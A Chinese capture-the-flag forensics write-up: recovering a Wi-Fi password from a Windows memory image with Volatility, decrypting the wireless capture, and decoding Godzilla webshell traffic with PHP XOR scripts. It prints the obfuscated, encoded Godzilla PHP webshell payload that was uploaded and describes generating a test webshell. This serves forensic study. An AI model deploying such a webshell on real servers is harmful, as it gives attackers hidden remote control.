写文章只是为了记录自己的学习,不是粘贴复制就完事了 参考 https://www.cnblogs.com/GKLBB/p/15315725.html https://www.nctry.com/2449.html https://www.freebuf.com/sectool/285693.html
题目链接: https://pan.baidu.com/s/1H2iVCuntQuyIemELCDXl6w 提取码: c6pk
常规姿势
文件内容 ![在这里插入图片描述](https://img-blog.csdnimg.cn/825e7becea8b4ed48d2bbde9e945d812.png)
用wireshake打开客户端.cap 发现流量被加密,但是依旧可以发现WiFi的名字是My_Wifi 要解密的话就需要wifi的密码 对windows而言,只要连过这个wifi,它的信息就会被保存,包括密码 查看连过的wifi ![在这里插入图片描述](https://img-blog.csdnimg.cn/b2aa7cebbfa94e20bc32ba0aee8ddac7.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAX19fX19fX19fX19fXyc=,size_14,color_FFFFFF,t_70,g_se,x_16) 查看某个密码 ![在这里插入图片描述](https://img-blog.csdnimg.cn/fa83dc810407440c93c9c22c81f9802a.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAX19fX19fX19fX19fXyc=,size_18,color_FFFFFF,t_70,g_se,x_16) 这些东西都在一个xml文件里 ![在这里插入图片描述](https://img-blog.csdnimg.cn/28a8f73430ec492a8996c16144deb31e.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAX19fX19fX19fX19fXyc=,size_20,color_FFFFFF,t_70,g_se,x_16) 知道了这些后我们就可以去镜像找xml文件了 因为没接触过取证用的volatility 又写了关于我在windows使用volatility取证这档事 ![在这里插入图片描述](https://img-blog.csdnimg.cn/8c7df531e8cc4983a8bbfd752ef02108.png) 扫描镜像里的文件把结果存到files.txt里 打开files.txt搜索.xml 得到四行结果
0x1e6d1530 \Windows\System32\tcpbidi.xml 128
0x3fcc5908 \Windows\System32\RacRules.xml 128
0x3fd0d390 \Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\5dd9f783008543df3e642ff1e99de4e8\System.Xml.ni.dll 128
0x3fd67bb0 \Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.XML.dll 128
显然这不是我们想找的文件 此外我们还知道的信息是WiFi的名字是My_Wifi 搜索My_Wifi得到一行结果
0x3fdc38c8 \Program Files\My_Wifi.zip\Temp\vmware-admin\VMwareDnD\2a1221c7\My_Wifi.zip 128
先把这个文件dump下来看看 ![在这里插入图片描述](https://img-blog.csdnimg.cn/f987aa2beea7471584fb35b8d3986495.png) ![在这里插入图片描述](https://img-blog.csdnimg.cn/36ced47494ea4edb823c46942dae13e1.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAX19fX19fX19fX19fXyc=,size_14,color_FFFFFF,t_70,g_se,x_16) 拖到Windows修改文件名为wifi.zip然后解压 ![在这里插入图片描述](https://img-blog.csdnimg.cn/dc3ecedbfd2849e1b2cdaac8e110756a.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAX19fX19fX19fX19fXyc=,size_9,color_FFFFFF,t_70,g_se,x_16) ![在这里插入图片描述](https://img-blog.csdnimg.cn/57b35613286f4fa5ac3f62218df61235.png) 题目说了压缩包里有密码的提示
网卡的guid就是密码 同时网卡的guid也是保存配置文件夹的名字 所以在files.txt里搜索Interfaces得到四行结果
0x1c7ec5c8 \ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{529B7D2A-05D1-4F21-A001-8F4FF817FC3A} 128
0x1f78f4b0 \ProgramData\Microsoft\Wlansvc\Profiles\Interfaces 128
0x3fa921c8 \ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{529B7D2A-05D1-4F21-A001-8F4FF817FC3A} 128
0x3fda8be8 \ProgramData\Microsoft\Wlansvc\Profiles\Interfaces 128
题目说了要加上花括号 所以解压密码就是{529B7D2A-05D1-4F21-A001-8F4FF817FC3A} 打开里面的xml文件发现密码是233@114514_qwe ![在这里插入图片描述](https://img-blog.csdnimg.cn/b0ad2349c5214d23a2439fdc905c01b0.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAX19fX19fX19fX19fXyc=,size_16,color_FFFFFF,t_70,g_se,x_16)
得到密码和ssid后对流量解密 ![在这里插入图片描述](https://img-blog.csdnimg.cn/10a82cafbbc64ec18455c21bf4e8c9c2.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAX19fX19fX19fX19fXyc=,size_9,color_FFFFFF,t_70,g_se,x_16) 选择protocols 找到IEEE 802.11 ![在这里插入图片描述](https://img-blog.csdnimg.cn/b18ab7c1ba574c92bbc078310acc97f6.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAX19fX19fX19fX19fXyc=,size_18,color_FFFFFF,t_70,g_se,x_16) ![在这里插入图片描述](https://img-blog.csdnimg.cn/30251d31cef44bacba9ddeb20734d099.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAX19fX19fX19fX19fXyc=,size_13,color_FFFFFF,t_70,g_se,x_16) wifi包解密后 但是wifi这么多包,不确定哪些属于webshell的流量 这时候服务器的包就可以派上用场了 上传哥斯拉用的是POST 过滤POST数据包得到服务器IP:42.192.84.152 ![在这里插入图片描述](https://img-blog.csdnimg.cn/0b2d5f7eea0f46548eb04d805c822a8f.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAX19fX19fX19fX19fXyc=,size_20,color_FFFFFF,t_70,g_se,x_16) 导出http对象 ![在这里插入图片描述](https://img-blog.csdnimg.cn/00e92707470143c2b36b3240219a5d88.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAX19fX19fX19fX19fXyc=,size_20,color_FFFFFF,t_70,g_se,x_16) 得到5个php文件 ![在这里插入图片描述](https://img-blog.csdnimg.cn/b727a753055a447f8d09ddbd4b8f3d49.png) 已知上传的是哥斯拉的马 看到%什么什么应该就知道这是url编码吧 所以首先拿去url解码 ![在这里插入图片描述](https://img-blog.csdnimg.cn/fb635c98afc14911bd00d6ee1260a0ea.png) 拿到php环境执行一下
echo base64_decode(strrev(urldecode('K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBXayR3coAiZpBCIgACIgACIK0welNHbl1HIgACIK0wOpYTMskSeltGJuM3chBHJoUDZthic0NnY1NHIvh2YlBCIgACIgACIK0wOpkSeltGJskSY0FGZkgib1JHQoUGZvNmblhSZk92YuV2X0YTZzFmYg8GajVGIgACIgACIgoQD7kiNxwCMskSeltGJuM3chBHJoUDZthic0NnY1NHIvh2YlBCIgACIgACIK0wOpQWYvxWehBHJowWY2VGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD')));
得到上传的代码 ![在这里插入图片描述](https://img-blog.csdnimg.cn/833874aafed649198496559bbd965a61.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAX19fX19fX19fX19fXyc=,size_11,color_FFFFFF,t_70,g_se,x_16) 可以看出使用的是php_xor_base64的加密器 如果看不出可以用哥斯拉生成对比一下使用的是什么加密器
接下来就是对哥斯拉的数据包解密了 说实话我也不会 所以又写了哥斯拉还原加密流量 看过哥斯拉流量分析后就很容易了 对于哥斯拉POST的数据包使用这个脚本解密
<?php
function encode($D,$K){
for($i=0;$i<strlen($D);$i++){
$c = $K[$i+1&15];
$D[$i] = $D[$i]^$c;
}
return $D;
}
$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
echo encode(base64_decode(urldecode('xxxxxxx')),$key);
对于哥斯拉的返回包使用这个脚本解密
<?php
function encode($D,$K){
for($i=0;$i<strlen($D);$i++){
$c = $K[$i+1&15];
$D[$i] = $D[$i]^$c;
}
return $D;
}
$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
echo gzdecode(encode(base64_decode(''),$key));
在POST里肯定没有什么我们想要的东西 所以返回到客户端.cap 筛选http的数据包 这里恰好都是源ip为42.192.84.152 如果有其它源ip不是42.192.84.152的就过滤掉 然后导出http对象 ![在这里插入图片描述](https://img-blog.csdnimg.cn/baa9fee21d7b4fa68278223e211348ae.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAX19fX19fX19fX19fXyc=,size_9,color_FFFFFF,t_70,g_se,x_16) 得到这么多文件
![在这里插入图片描述](https://img-blog.csdnimg.cn/d154a3776a2f44739df466ad4da10c20.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAX19fX19fX19fX19fXyc=,size_15,color_FFFFFF,t_70,g_se,x_16) 把css,js,png结尾的文件删掉 剩下这么多打开查看 ![在这里插入图片描述](https://img-blog.csdnimg.cn/fb9412ca08bd44b5a0c979544c7011d3.png) 发现只有四个是哥斯拉的返回包
![在这里插入图片描述](https://img-blog.csdnimg.cn/d936d2d067c841a5bc04656d048d8d9d.png) 利用上面的脚本开始解密 解密的时候要去掉头16位去掉尾16位 其中第一个包解密后为 ![在这里插入图片描述](https://img-blog.csdnimg.cn/6b5be3b364404a54bd299cb158aa6ade.png) 第二个包解密 ![在这里插入图片描述](https://img-blog.csdnimg.cn/5472c38d5a5642dca3079eb710cb7eda.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAX19fX19fX19fX19fXyc=,size_18,color_FFFFFF,t_70,g_se,x_16) 第三个包解密 ![在这里插入图片描述](https://img-blog.csdnimg.cn/15adbbe6642d4c9091649f20a24e7aa4.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAX19fX19fX19fX19fXyc=,size_18,color_FFFFFF,t_70,g_se,x_16) 第四个包解密得到flag ![在这里插入图片描述](https://img-blog.csdnimg.cn/c364bd632b8a4ebb9e3bb51dc0c663fb.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAX19fX19fX19fX19fXyc=,size_15,color_FFFFFF,t_70,g_se,x_16)
大佬的另一种姿势
当你没有解密脚本的时候 已知条件哥斯拉木马的源码 ![在这里插入图片描述](https://img-blog.csdnimg.cn/732ad0cfb786455cad4da7d14bc76198.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAX19fX19fX19fX19fXyc=,size_20,color_FFFFFF,t_70,g_se,x_16) 观察发现这个key就是默认的key 也就是key经过md5加密后前16位 验证猜想:用哥斯拉生成一个木马 ![在这里插入图片描述](https://img-blog.csdnimg.cn/d9fc772459f84f629f4fd0c9e3939ab7.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAX19fX19fX19fX19fXyc=,size_12,color_FFFFFF,t_70,g_se,x_16) 发现两个是一样的 接下来把木马丢到虚拟机里 用phpstudy搭个环境 ![在这里插入图片描述](https://img-blog.csdnimg.cn/89e7ca5ea9b5495a9ddd210793004f65.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAX19fX19fX19fX19fXyc=,size_17,color_FFFFFF,t_70,g_se,x_16)
打开哥斯拉测试连接 ![在这里插入图片描述](https://img-blog.csdnimg.cn/02ab4a19624c4e17871213084b7683f3.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAX19fX19fX19fX19fXyc=,size_16,color_FFFFFF,t_70,g_se,x_16) 开启burp代理添加
![在这里插入图片描述](https://img-blog.csdnimg.cn/61eb7295b1554bbfab620f359544c31a.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAX19fX19fX19fX19fXyc=,size_11,color_FFFFFF,t_70,g_se,x_16) ![在这里插入图片描述](https://img-blog.csdnimg.cn/7d4f08deb1dd43bdb08cbf6ab6982617.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAX19fX19fX19fX19fXyc=,size_16,color_FFFFFF,t_70,g_se,x_16) 执行一个命令截断 ![在这里插入图片描述](https://img-blog.csdnimg.cn/7c9045e35ef94984937774a5a2b12464.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAX19fX19fX19fX19fXyc=,size_20,color_FFFFFF,t_70,g_se,x_16) ![在这里插入图片描述](https://img-blog.csdnimg.cn/6cab0aea3b5a4344bcdb2eaa7fe6e3b5.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAX19fX19fX19fX19fXyc=,size_20,color_FFFFFF,t_70,g_se,x_16) 最多四次就出来了,之前导出的http对象不是还剩这四个是格拉斯加密的包吗 ![在这里插入图片描述](https://img-blog.csdnimg.cn/dff0118ee26e456d89a7b816b720b429.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/e5c3d08df3c24bda8e7999bd1fcd9091.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAX19fX19fX19fX19fXyc=,size_16,color_FFFFFF,t_70,g_se,x_16) 这样干的好处就是不需要解密脚本了
|